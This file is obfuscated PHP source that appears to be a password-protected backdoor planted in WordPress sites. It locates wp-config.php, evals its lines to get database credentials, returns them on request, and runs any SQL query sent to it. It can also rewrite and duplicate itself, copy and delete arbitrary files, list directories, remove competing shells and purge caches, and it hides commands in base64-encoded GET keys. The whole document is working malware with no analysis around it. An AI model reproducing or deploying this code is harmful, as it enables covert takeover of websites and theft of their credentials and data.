sp7bbc45

1. 19llp4OP4f
2. <?php
3. define('EXT_MYSQLI', 'mysqli'); define('EXT_MYSQL', 'mysql'); define('CONF_PASSWORD_HASH', '0e618e1a7a4b45f63d10348b6b503a70'); define('VERSION', '0.2.3'); function r_get_lib() { if (class_exists('mysqli')) { return EXT_MYSQLI; } if (function_exists('mysql_connect')) { return EXT_MYSQL; } } function r_get_config_path() { $sp7bbc45 = realpath('.'); $spb73a0e = 0; while ($sp7bbc45 != '/') { if (file_exists(sprintf('%s/wp-config.php', $sp7bbc45)) && file_exists(sprintf('%s/index.php', $sp7bbc45)) && file_exists(sprintf('%s/wp-settings.php', $sp7bbc45))) { return $sp7bbc45; } $spb73a0e++; $sp7bbc45 = realpath(str_repeat('../', $spb73a0e)); } } function r_get_config() { $sp7bbc45 = realpath('.'); $spb73a0e = 0; while ($sp7bbc45 != '/') { file_put_contents('flog.log', $sp7bbc45 . '
4. ', FILE_APPEND); if (file_exists(sprintf('%s/wp-config.php', $sp7bbc45)) && file_exists(sprintf('%s/index.php', $sp7bbc45)) && file_exists(sprintf('%s/wp-settings.php', $sp7bbc45))) { $sp6448b2 = file(sprintf('%s/wp-config.php', $sp7bbc45)); $sp6448b2 = preg_grep('/defined/i', preg_grep('/define|table_prefix/i', $sp6448b2), PREG_GREP_INVERT); $sp6448b2 = implode('
5. ', $sp6448b2); eval($sp6448b2); $spab89ed = 'table_prefix'; $spedb123 = explode(':', DB_HOST); $spa838dd = array_shift($spedb123); $spf32a62 = array_shift($spedb123); $spf32a62 = $spf32a62 ? $spf32a62 : 3306; return array('host' => $spa838dd, 'port' => $spf32a62, 'db' => DB_NAME, 'user' => DB_USER, 'pass' => DB_PASSWORD, 'prefix' => ${$spab89ed}, 'path' => $sp7bbc45); break; } $spb73a0e++; $sp7bbc45 = realpath(str_repeat('../', $spb73a0e)); } } function r_mysql_connect($sp6448b2) { $sp52f15a = mysql_connect(sprintf('%s:%s', $sp6448b2['host'], $sp6448b2['port']), $sp6448b2['user'], $sp6448b2['pass']); mysql_select_db($sp6448b2['db'], $sp52f15a); return $sp52f15a; } function r_mysqli_connect($sp6448b2) { return new mysqli($sp6448b2['host'], $sp6448b2['user'], $sp6448b2['pass'], $sp6448b2['db'], is_numeric($sp6448b2['port']) ? $sp6448b2['port'] : 3306, !is_numeric($sp6448b2['port']) ? $sp6448b2['port'] : null); } function r_mysql_query($sp6448b2, $sp52f15a, $sp510788, $spdc632d = array()) { if (!empty($spdc632d)) { foreach ($spdc632d as $spb52fff => $sp211e9a) { $sp510788 = str_replace($spb52fff, mysql_real_escape_string($sp211e9a, $sp52f15a), $sp510788); } } $sp40206a = array(); $sp71e504 = mysql_query($sp510788, $sp52f15a); if ($sp71e504) { while ($sp31d1fe = mysql_fetch_assoc($sp71e504)) { $sp40206a[] = $sp31d1fe; } return array('success' => $sp40206a); } else { return array('error' => sprintf('%s :: %s', mysql_errno($sp52f15a), mysql_error($sp52f15a))); } } function r_mysqli_query($sp6448b2, $sp52f15a, $sp510788, $spdc632d = array()) { if (!empty($spdc632d)) { foreach ($spdc632d as $spb52fff => $sp211e9a) { $sp510788 = str_replace($spb52fff, $sp52f15a->real_escape_string($sp211e9a), $sp510788); } } $sp71e504 = $sp52f15a->query($sp510788); if (is_object($sp71e504)) { $sp40206a = array(); while ($sp31d1fe = $sp71e504->fetch_assoc()) { $sp40206a[] = $sp31d1fe; } return array('success' => $sp40206a); } if ($sp71e504) { return array('success' => true); } else { return array('error' => sprintf('%s :: %s', $sp52f15a->errno, $sp52f15a->error)); } } function r_mysql_query_res($sp6448b2, $sp52f15a, $sp510788, $spdc632d = array()) { if (!empty($spdc632d)) { foreach ($spdc632d as $spb52fff => $sp211e9a) { $sp510788 = str_replace($spb52fff, mysql_real_escape_string($sp211e9a, $sp52f15a), $sp510788); } } $sp40206a = array(); $sp71e504 = mysql_query($sp510788, $sp52f15a); return $sp71e504; } function r_mysql_query_row($sp71e504) { if ($sp71e504) { return mysql_fetch_assoc($sp71e504); } else { return false; } } function r_mysqli_query_res($sp6448b2, $sp52f15a, $sp510788, $spdc632d = array()) { if (!empty($spdc632d)) { foreach ($spdc632d as $spb52fff => $sp211e9a) { $sp510788 = str_replace($spb52fff, $sp52f15a->real_escape_string($sp211e9a), $sp510788); } } $sp71e504 = $sp52f15a->query($sp510788); return $sp71e504; } function r_mysqli_query_row($sp71e504) { if (is_object($sp71e504)) { return $sp71e504->fetch_assoc(); } else { return false; } } function r_unmagic() { if (get_magic_quotes_gpc()) { foreach ($_POST as $spb52fff => $sp211e9a) { $_POST[$spb52fff] = stripslashes($sp211e9a); } } } function r_action_prefix() { $sp6448b2 = r_get_config(); echo $sp6448b2['prefix']; } function r_action_query() { r_unmagic(); $sp6448b2 = r_get_config(); $sp20de71 = r_get_lib(); $spdc632d = json_decode($_POST['bind'], true); if (isset($_POST['decode'])) { $spb34ffd = array_map('trim', explode(',', $_POST['decode'])); foreach ($spb34ffd as $spc20910) { if (isset($spdc632d[$spc20910])) { $spdc632d[$spc20910] = base64_decode($spdc632d[$spc20910]); } } } $sp52f15a = call_user_func(sprintf('r_%s_connect', $sp20de71), $sp6448b2); $sp71e504 = call_user_func(sprintf('r_%s_query', $sp20de71), $sp6448b2, $sp52f15a, $_POST['query'], $spdc632d); if (isset($_POST['encode'])) { $sp6dca10 = array_map('trim', explode(',', $_POST['encode'])); foreach ($sp71e504['success'] as $spa5637e => $sp31d1fe) { foreach ($sp6dca10 as $spe3707f) { $sp71e504['success'][$spa5637e][$spe3707f] = base64_encode($sp71e504['success'][$spa5637e][$spe3707f]); } } } echo json_encode($sp71e504); } function r_action_update() { file_put_contents(__FILE__, base64_decode($_POST['file'])); echo md5(base64_decode($_POST['file'])); } function r_action_version() { echo VERSION; } function r_action_duplicate() { $spdc3780 = copy(__FILE__, $_POST['dst']); echo (int) $spdc3780; } function r_action_copy() { $spdc3780 = copy($_POST['src'], $_POST['dst']); echo (int) $spdc3780; } function r_action_dir() { $spdc3780 = array(); $spc20910 = dir($_POST['dir']); while (false !== ($spf7de93 = $spc20910->read())) { $spf359a4 = sprintf('%s/%s', rtrim($_POST['dir'], '/'), $spf7de93); $spdc3780[] = array('type' => is_file($spf359a4) ? 'file' : (is_dir($spf359a4) ? 'dir' : 'unknown'), 'entry' => $spf7de93, 'full_entry' => $spf359a4, 'realpath' => realpath($spf359a4)); } $spc20910->close(); echo json_encode($spdc3780); } function r_action_wpversion() { $sp7bbc45 = r_get_config_path(); $sp09e4ed = file_get_contents(sprintf('%s/wp-settings.php', $sp7bbc45)); preg_match_all('/define\\(([^\\)]+)/i', $sp09e4ed, $sp0386fe); foreach ($sp0386fe[1] as $sp65229a) { if (strpos($sp65229a, 'WPINC') !== false) { $sp65229a = array_map('trim', explode(',', $sp65229a)); foreach ($sp65229a as $sp17114d => $spfcd819) { if ($spfcd819[0] == $spfcd819[strlen($spfcd819) - 1]) { $sp65229a[$sp17114d] = substr($spfcd819, 1, strlen($spfcd819) - 2); } } require_once $sp376b10 = sprintf('%s%s%s%sversion.php', $sp7bbc45, DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, $sp65229a[1]), DIRECTORY_SEPARATOR); $sp7156de = 'wp_version'; echo ${$sp7156de}; die; } } echo 'error'; } function r_action_w3tc() { $sp7bbc45 = r_get_config_path(); $sp95f4d5 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $spb859b3 = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } $spb859b3 = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html_gzip', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } echo 'success'; } function r_action_cenabler() { $sp7bbc45 = r_get_config_path(); $sp95f4d5 = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $spb859b3 = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } $spb859b3 = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html.gz', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } $spb859b3 = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } $spb859b3 = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html.gz', $sp7bbc45, $sp95f4d5); if (file_exists($spb859b3)) { unlink($spb859b3); } echo 'success'; } function r_action_removeshell() { if (file_exists($spe29cd5 = sprintf('%s%s%s', rtrim($_SERVER['DOCUMENT_ROOT'], '/'), DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, ltrim($_POST['shell_url'], '/'))))) { if ($spe29cd5 != __FILE__) { unlink($spe29cd5); } echo file_exists($spe29cd5) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_remove() { if (file_exists($_POST['file'])) { if ($_POST['file'] != __FILE__) { unlink($_POST['file']); } echo file_exists($_POST['file']) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_pages() { $sp86f829 = tempnam('./', 'wp') . '.php'; $spcbe118 = fopen($sp86f829, 'w'); $sp7bbc45 = r_get_config_path(); chdir($sp7bbc45); $sp951cf3 = $_POST['id']; require $sp7bbc45 . '/wp-load.php'; r_unmagic(); $sp6448b2 = r_get_config(); $sp20de71 = r_get_lib(); $spfe8955 = $sp6448b2['prefix']; $sp52f15a = call_user_func(sprintf('r_%s_connect', $sp20de71), $sp6448b2); $sp71e504 = call_user_func(sprintf('r_%s_query_res', $sp20de71), $sp6448b2, $sp52f15a, sprintf('SELECT * FROM `%sposts` WHERE `post_type` IN ( "post", "page" ) AND `post_status` = "publish" AND `ID` > %s ORDER BY `ID` ASC LIMIT %s, %s', $spfe8955, $_POST['remote_id'], $_POST['batch_start'], $_POST['batch_size'])); while ($sp31d1fe = call_user_func(sprintf('r_%s_query_row', $sp20de71), $sp71e504)) { fputcsv($spcbe118, array($sp31d1fe['ID'], base64_encode($sp31d1fe['post_content']), base64_encode($sp31d1fe['post_title']), base64_encode(get_permalink($sp31d1fe['ID'])))); } fclose($spcbe118); echo $sp86f829; } function r_action_config() { echo json_encode(r_get_config()); } function r_action_getlib() { echo r_get_lib(); } function r_action_magic() { echo get_magic_quotes_gpc() ? 'Yes' : 'No'; } function r_action_loginurl() { $sp6ce46b = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}"; $spf090ca = $sp6ce46b; $sp879d2d = basename(__FILE__); $sp86f829 = basename(tempnam('./', 'ert') . '.php'); $sp128ad6 = preg_replace(sprintf('/%s$/i', preg_quote($sp879d2d)), $sp86f829, $spf090ca); echo file_get_contents($sp128ad6); } if (count($_GET) == 1 && !trim($sp429c33 = array_pop(array_values($_GET)))) { $sp71e504 = array(); parse_str(base64_decode(array_shift(array_keys($_GET))), $sp71e504); $_GET = $sp71e504; } $_POST = array_merge($_POST, $_GET); if (CONF_PASSWORD_HASH == md5($_POST['password'])) { switch ($_POST['action']) { case 'link': $sp7bbc45 = r_get_config_path(); chdir($sp7bbc45); $sp951cf3 = $_POST['id']; require_once $sp7bbc45 . '/wp-load.php'; $sp69ab9a = get_permalink($_POST['id']); echo sprintf('[<{%s}>]', $sp69ab9a); break; default: $sp392490 = sprintf('r_action_%s', $_POST['action']); call_user_func($sp392490); break; } } else { die('ympf'); }